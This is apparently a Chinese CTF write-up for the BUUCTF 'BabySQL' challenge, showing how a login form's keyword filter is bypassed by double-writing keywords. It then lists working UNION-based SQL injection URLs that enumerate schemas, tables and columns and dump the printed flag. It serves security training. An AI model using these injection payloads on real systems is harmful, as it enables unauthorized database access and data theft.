极客大挑战 2019]BabySQL

地址:[极客大挑战 2019]BabySQL
在这里插入图片描述
在这里插入图片描述
一个登陆框,尝试admin/admin登陆
在这里插入图片描述
GET方式传参,测试注入
在这里插入图片描述
测试存在过滤
在这里插入图片描述
简单Fuzz一下
在这里插入图片描述
在这里插入图片描述

测试请求过快,出现429的情况,可以配置下延时爆破
在这里插入图片描述
在这里插入图片描述
出现Input your username and password都是被过滤的字符
知道被过滤的字符就好办了,使用双写绕过即可。

http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=' oorrder bbyy 4--+&password=admin

存在3个字段
在这里插入图片描述

回显位为第二个字段第三个字段

http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=' uniunionon seleselectct 1,2,3--+&password=admin

在这里插入图片描述
查询所有库

http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=' uniunionon seleselectct 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata--+&password=admin

在这里插入图片描述
所有库如下:

information_schema,mysql,performance_schema,test,ctf,geek

查ctf库的所有表

http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=' uniunionon seleselectct 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='ctf'--+&password=admin

在这里插入图片描述
ctf库下存在如下表:

Flag

查询Flag表下的所有字段

http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=' uniunionon seleselectct 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='Flag'--+&password=admin

在这里插入图片描述

查询到的字段如下:

flag

直接查flag字段内容

http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=' uniunionon seleselectct 1,2,group_concat(flag) frfromom ctf.Flag--+&password=admin

在这里插入图片描述

flag{3be4542d-5fe6-4dfb-894f-28845c3be740}

  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值